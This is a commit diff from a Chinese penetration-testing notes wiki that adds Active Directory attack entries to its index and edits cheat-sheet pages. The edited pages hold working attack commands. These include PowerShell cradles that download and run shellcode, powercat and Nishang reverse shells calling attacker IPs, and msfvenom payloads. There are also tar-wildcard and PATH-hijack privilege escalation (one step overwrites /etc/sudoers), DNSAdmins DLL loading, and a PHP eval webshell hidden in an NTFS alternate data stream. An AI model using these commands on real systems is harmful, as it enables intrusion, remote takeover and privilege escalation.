Skip to content

Commit 34e5ebf

Browse files
committed
update active directory hacking
1 parent df1b5a7 commit 34e5ebf

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

44 files changed

+869
-94
lines changed

wiki/README.md

+36-1
Original file line numberDiff line numberDiff line change
@@ -387,6 +387,10 @@
387387
- [攻击MSSQL数据库](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/攻击MSSQL数据库.md)
388388
- [攻击MySQL数据库](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/攻击MySQL数据库.md)
389389
- [账户委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/账户委派.md)
390+
- [kerberos约束委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/kerberos约束委派.md)
391+
- [kerberos无约束委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/kerberos无约束委派.md)
392+
- [kerberos青铜比特攻击CVE-2020-17049](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/kerberos青铜比特攻击CVE-2020-17049.md)
393+
- [基于kerberos资源的约束委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/基于kerberos资源的约束委派.md)
390394
- [CVE-2019-0708](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/CVE-2019-0708.md)
391395
- [获取保存的RDP密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/获取保存的RDP密码.md)
392396
- [GPP-Password](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/GPP-Password.md)
@@ -412,7 +416,38 @@
412416
- [资源受限委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/资源受限委派.md)
413417
- [WinRM无文件执行](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/WinRM无文件执行.md)
414418
- [组策略对象GPO](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/组策略对象GPO.md)
415-
419+
- [危险的内置组使用](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/危险的内置组使用.md)
420+
- [ActiveDirectory证书服务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/README.md)
421+
- [查找证书服务器](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/查找证书服务器.md)
422+
- [ESC1-配置错误的证书模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC1-配置错误的证书模板.md)
423+
- [ESC2-配置错误的证书模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC2-配置错误的证书模板.md)
424+
- [ESC3-配置错误的注册代理模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC3-配置错误的注册代理模板.md)
425+
- [ESC4-访问控制漏洞](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC4-访问控制漏洞.md)
426+
- [ESC6-EDITF_ATTRIBUTESUBJECTALTNAME2](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC6-EDITF_ATTRIBUTESUBJECTALTNAME2.md)
427+
- [ESC7-易受攻击的证书颁发机构访问控制](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC7-易受攻击的证书颁发机构访问控制.md)
428+
- [ESC8-ADCS中继攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC8-ADCS中继攻击.md)
429+
- [经过认证的CVE-2022-26923](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/经过认证的CVE-2022-26923.md)
430+
- [Pass-The-Certificate](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/Pass-The-Certificate.md)
431+
- [ActiveDirectory的ACL和ACE](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/README.md)
432+
- [GenericAll](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/GenericAll.md)
433+
- [GenericWrite](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/GenericWrite.md)
434+
- [WriteDACL](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/WriteDACL.md)
435+
- [WriteOwner](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/WriteOwner.md)
436+
- [读取GMSA密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/读取GMSA密码.md)
437+
- [读取LAPS密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/读取LAPS密码.md)
438+
- [强制更改密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/强制更改密码.md)
439+
- [DCOM-Exploitation](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/README.md)
440+
- [DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/DCOM.md)
441+
- [通过MMC应用程序类进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过MMC应用程序类进行DCOM.md)
442+
- [通过Office进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过Office进行DCOM.md)
443+
- [通过ShellExecute进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过ShellExecute进行DCOM.md)
444+
- [通过ShellBrowserWindow进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过ShellBrowserWindow进行DCOM.md)
445+
- [域与域](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/域与域.md)
446+
- [SCCM部署](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/SCCM部署.md)
447+
- [WSUS部署](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/WSUS部署.md)
448+
- [PrivExchange攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/PrivExchange攻击.md)
449+
- [RODC-只读域控制器入侵](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/RODC-只读域控制器入侵.md)
450+
- [PXE启动映像攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/PXE启动映像攻击.md)
416451
- [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/README.md)
417452
- [Windows](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/README.md)
418453
- [Invoke-ADSBackdoor](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Invoke-ADSBackdoor.md)

wiki/内网和域/命令与控制/Powershell.md

+36-36
Original file line numberDiff line numberDiff line change
@@ -1,70 +1,70 @@
11
#### MSF+Powershell
2-
反弹MSF
3-
靶机
2+
反弹MSF
3+
靶机
44
PS >IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.100/powersploit/CodeExecution/Invoke-Shellcode.ps1')
55
PS >Invoke-Shellcode -payload windows/meterpreter/reverse_http -lhost 192.168.0.100 -lport 6666 -force
6-
攻击机:
6+
攻击机:
77
>use exploit/multi/handler
88
>set payload windows/x64/meterpreter/reverse_ https
99
>run
10-
10+
1111
>msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.100 LPORT=4444 -f powershell -o /var/www/html/ps
1212
>IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.100/powersploit/CodeExecution/Invoke-Shellcode.ps1")
1313
>IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.100/ps")
1414
>Invoke-Shellcode -Shellcode ($buf)
15-
15+
1616
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 -f psh-reflection >/var/www/html/a.ps1
1717
>powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.101/a.ps1')"
1818
#### Powercat
1919
>powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
20-
正向连接
21-
靶机:powercat -l -p 8080 -e cmd.exe –v
22-
攻击机:nc 192.168.0.1 8080 –vv
23-
反向连接:
24-
攻击机:nc –l –p 8080 –vv
25-
靶机:powercat –c 192.168.0.1 –p 8080 –v –e cmd.exe
26-
远程执行
20+
正向连接
21+
靶机:powercat -l -p 8080 -e cmd.exe –v
22+
攻击机:nc 192.168.0.1 8080 –vv
23+
反向连接:
24+
攻击机:nc –l –p 8080 –vv
25+
靶机:powercat –c 192.168.0.1 –p 8080 –v –e cmd.exe
26+
远程执行
2727
>powershell -nop -w hidden -ep bypass "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.0.107/ps/powercat/powercat.ps1'); powercat -c 192.168.0.107 -p 12345 -v -e cmd.exe"
28-
正向连接
29-
靶机:powercat -l -p 8080 -e cmd.exe -v
30-
攻击机:nc 192.168.0.1 8080 -vv
31-
反向连接:
32-
攻击机:nc -l -p 8080 -vv
33-
靶机:powercat -c 192.168.0.1 -p 8080 -v -e cmd.exe
28+
正向连接
29+
靶机:powercat -l -p 8080 -e cmd.exe -v
30+
攻击机:nc 192.168.0.1 8080 -vv
31+
反向连接:
32+
攻击机:nc -l -p 8080 -vv
33+
靶机:powercat -c 192.168.0.1 -p 8080 -v -e cmd.exe
3434
![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/207.png)
3535
#### Nishang
3636
##### Bind shell
37-
靶机:
37+
靶机:
3838
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Bind -Port 12138"
39-
攻击机:
40-
>nc 靶机IP 12138
41-
##### 反向shell
42-
攻击机:
39+
攻击机:
40+
>nc 靶机IP 12138
41+
##### 反向shell
42+
攻击机:
4343
>nc -vnlp 9999
44-
靶机:
45-
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻击机IP -port 9999"
46-
##### UDP反向shell
47-
攻击机:
44+
靶机:
45+
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻击机IP -port 9999"
46+
##### UDP反向shell
47+
攻击机:
4848
>nc -lvup 12138
49-
靶机:
50-
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻击机IP -port 12138"
49+
靶机:
50+
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻击机IP -port 12138"
5151
##### HTTPS
52-
攻击机:
53-
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PoshRatHttps.ps1'); Invoke-PoshRatHttps -IPAddress 192.168.0.98 -Port 8080 -SSLPort 443" IP地址是本机IP
52+
攻击机:
53+
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PoshRatHttps.ps1'); Invoke-PoshRatHttps -IPAddress 192.168.0.98 -Port 8080 -SSLPort 443" IP地址是本机IP
5454
![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/208.png)
5555

56-
靶机:
56+
靶机:
5757
>powershell -w hidden -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.98:8080/connect')
5858
![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/209.png)
5959
##### ICMP
60-
攻击机IP:108
61-
靶机IP:100
60+
攻击机IP:108
61+
靶机IP:100
6262
https://github.com/inquisb/icmpsh
63-
靶机执行
63+
靶机执行
6464
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/nishang/Shells/Invoke-PowerShellIcmp.ps1');Invoke-PowerShellIcmp 192.168.0.108
6565
![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/210.png)
6666

67-
攻击机执行,开启相应ICMP ECHO请求
67+
攻击机执行,开启相应ICMP ECHO请求
6868
>sysctl -w net.ipv4.icmp_echo_ignore_all=1
6969
>./icmpsh_m.py 192.168.0.108 192.168.0.100
7070
![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/211.png)

wiki/权限提升/Linux提权/Lxd提权.md

+4-4
Original file line numberDiff line numberDiff line change
@@ -1,11 +1,11 @@
1-
查看文件是否存在
1+
查看文件是否存在
22
>which lxd & >which lxc
3-
攻击机
3+
攻击机
44
>git clone https://github.com/saghul/lxd-alpine-builder.git
55
>cd lxd-alpine-builder
66
>./build-alpine
7-
搞个web服务提供下载>python -m SimpleHTTPServer
8-
靶机下载
7+
搞个web服务提供下载>python -m SimpleHTTPServer
8+
靶机下载
99
>wget http://192.168.1.107:8000/apline-v3.10-x86_64-20191008_1227.tar.gz
1010
>lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
1111
>lxc image list

wiki/权限提升/Linux提权/环境变量提权.md

+22-22
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
1-
##### 第一种
2-
假设存在一个脚本代码为
1+
##### 第一种
2+
假设存在一个脚本代码为
33
```c
44
#include<unistd.h>
55
void main()
@@ -10,13 +10,13 @@
1010
}
1111
```
1212
13-
编译
13+
编译
1414
>gcc demo.c -o shell
1515
>chmod u+s shell
16-
执行./shell 回显ps命令
17-
提权
16+
执行./shell 回显ps命令
17+
提权
1818
find / -perm -u=s -type f 2>/dev/null
19-
存在脚本/home/name/script/shell
19+
存在脚本/home/name/script/shell
2020
>cd /tmp
2121
>echo "/bin/bash" > ps
2222
>chmod 777 ps
@@ -25,20 +25,20 @@
2525
>cd /home/raj/script
2626
>./shell
2727
>whoami
28-
或使用copy命令
28+
或使用copy命令
2929
>cd /home/raj/script/
3030
>cp /bin/sh /tmp/ps
3131
>echo $PATH
3232
>export PATH=/tmp:$PATH
3333
>./shell
3434
>whoami
35-
或使用ln命令
35+
或使用ln命令
3636
>ln -s /bin/sh ps
3737
>export PATH=.:$PATH
3838
>./shell
3939
>id
40-
##### 第二种
41-
假设存在一个脚本代码为
40+
##### 第二种
41+
假设存在一个脚本代码为
4242
```c
4343
#include<unistd.h>
4444
void main()
@@ -49,12 +49,12 @@
4949
}
5050
```
5151

52-
编译
52+
编译
5353
>gcc test.c -o shell2
5454
>chmod u+s shell2
55-
提权
55+
提权
5656
find / -perm -u=s -type f 2>/dev/null
57-
存在脚本/home/name/script/shell2
57+
存在脚本/home/name/script/shell2
5858
>cd /tmp
5959
>echo "/bin/bash" > id
6060
>chmod 777 id
@@ -63,8 +63,8 @@
6363
>cd /home/raj/script
6464
>./shell2
6565
>whoami
66-
##### 第三种
67-
假设存在一个脚本代码为
66+
##### 第三种
67+
假设存在一个脚本代码为
6868
```c
6969
#include<unistd.h>
7070
void main()
@@ -75,21 +75,21 @@
7575
}
7676
```
7777
78-
编译后提权
78+
编译后提权
7979
find / -perm -u=s -type f 2>/dev/null
80-
存在脚本/home/name/script/shell3
80+
存在脚本/home/name/script/shell3
8181
>cd /tmp
8282
>vi cat
83-
内容为/bin/bash
83+
内容为/bin/bash
8484
>chmod 777 cat
8585
>ls -al cat
8686
>echo $PATH
8787
>export PATH=/tmp:$PATH
8888
>cd /home/raj/script
8989
>./shell3
9090
>whoami
91-
##### 第四种
92-
假设存在一个脚本代码为
91+
##### 第四种
92+
假设存在一个脚本代码为
9393
```c
9494
#include<unistd.h>
9595
void main()
@@ -100,9 +100,9 @@
100100
}
101101
```
102102

103-
编译后提权
103+
编译后提权
104104
find / -perm -u=s -type f 2>/dev/null
105-
存在脚本/home/name/script/shell4
105+
存在脚本/home/name/script/shell4
106106
>cd /tmp
107107
>vi cat
108108
>chmod 777 cat

wiki/权限提升/Linux提权/通配符提权.md

+9-9
Original file line numberDiff line numberDiff line change
@@ -1,23 +1,23 @@
1-
低权限登录
2-
查看cron
1+
低权限登录
2+
查看cron
33
>cat /etc/crontab
4-
存在一个定时压缩目录的任务
5-
生成反向shell
4+
存在一个定时压缩目录的任务
5+
生成反向shell
66
>msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=8888 R
7-
再监听
7+
再监听
88
>nc -lvp 8888
9-
靶机执行
9+
靶机执行
1010
>echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
1111
>echo "" > "--checkpoint-action=exec=sh shell.sh"
1212
>echo "" > --checkpoint=1
1313
>tar cf archive.tar *
14-
即可返回shell
15-
或使用sudoer
14+
即可返回shell
15+
或使用sudoer
1616
>echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh
1717
>echo "" > "--checkpoint-action=exec=sh demo.sh"
1818
>echo "" > --checkpoint=1
1919
>tar cf archive.tar *
20-
或suid
20+
或suid
2121
>echo "chmod u+s /usr/bin/find" > test.sh
2222
>echo "" > "--checkpoint-action=exec=sh test.sh"
2323
>echo "" > --checkpoint=1
Original file line numberDiff line numberDiff line change
@@ -1,11 +1,18 @@
1-
>whoami /groups 可以看到当前用户是DnsAdmins组
2-
>msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f dll -o 1.dll
3-
使用impacket中的smbserver.py托管root目录
4-
>smbserver.py -smb2support raj /root
5-
靶机通过dnscmd.exe将DLL传递到内存
6-
>dnscmd.exe /config /serverlevelplugindll \\192.168.0.1\raj\1.dll
7-
攻击机监听
8-
>nc -lvp 11111
9-
靶机重启dns
10-
>sc stop dns
11-
>sc start dns
1+
DNSAdmins 组的成员可以加载具有 dns.exe (SYSTEM) 权限的任意 DLL。
2+
需要权限才能重新启动 DNS 服务。
3+
枚举 DNSAdmins 组的成员
4+
>Get-NetGroupMember -GroupName "DNSAdmins"
5+
>Get-ADGroupMember -Identity DNSAdmins
6+
更改 DNS 服务加载的 dll
7+
使用RSAT
8+
>dnscmd <servername> /config /serverlevelplugindll \\attacker_IP\dll\mimilib.dll
9+
>dnscmd 10.10.10.11 /config /serverlevelplugindll \\10.10.10.10\exploit\privesc.dll
10+
使用DNSServer模块
11+
$dnsettings = Get-DnsServerSetting -ComputerName <servername> -Verbose -All
12+
$dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll"
13+
Set-DnsServerSetting -InputObject $dnsettings -ComputerName <servername> -Verbose
14+
检查上一条命令是否成功
15+
>Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
16+
重新启动 DNS
17+
>sc \\dc01 stop dns
18+
>sc \\dc01 start dns
+10-10
Original file line numberDiff line numberDiff line change
@@ -1,21 +1,21 @@
1-
指定宿主文件,index.php是网页正常文件
1+
指定宿主文件,index.php是网页正常文件
22
>echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
3-
<?php include(‘index.php:hidden.jpg’)?>
3+
<?php include(‘index.php:hidden.jpg’)?>
44
<?php
5-
$a="696E6465782E7068703"."A68696464656E2E6A7067";#hex编码
5+
$a="696E6465782E7068703"."A68696464656E2E6A7067";#hex编码
66
$b="a";
77
include(PACK('H*',$$b))
88
?>
99
>echo 9527 > 1.txt:flag.txt
1010
>notepad 1.txt:flag.txt
11-
或不指定宿主文件
11+
或不指定宿主文件
1212
>echo hide > :key.txt
1313
>cd ../
1414
>notepad test:key.txt
15-
上传处绕过
16-
|上传的文件名 |服务器表面现象 |生成的文件内容 |
15+
上传处绕过
16+
|上传的文件名 |服务器表面现象 |生成的文件内容 |
1717
| ------------ | ------------ | ------------ |
18-
|test.php:a.jpg |生成test.php ||
19-
|test.php::$DATA | 生成test.php |<?php phpinfo();?> |
20-
|test.php::$INDEX_ALLOCATION |生成test.php文件夹 |\ |
21-
|test.php::$DATA\0.jpg |生成0.jpg |<?php phpinfo();?> |
18+
|test.php:a.jpg |生成test.php ||
19+
|test.php::$DATA | 生成test.php |<?php phpinfo();?> |
20+
|test.php::$INDEX_ALLOCATION |生成test.php文件夹 |\ |
21+
|test.php::$DATA\0.jpg |生成0.jpg |<?php phpinfo();?> |

0 commit comments

Comments
 (0)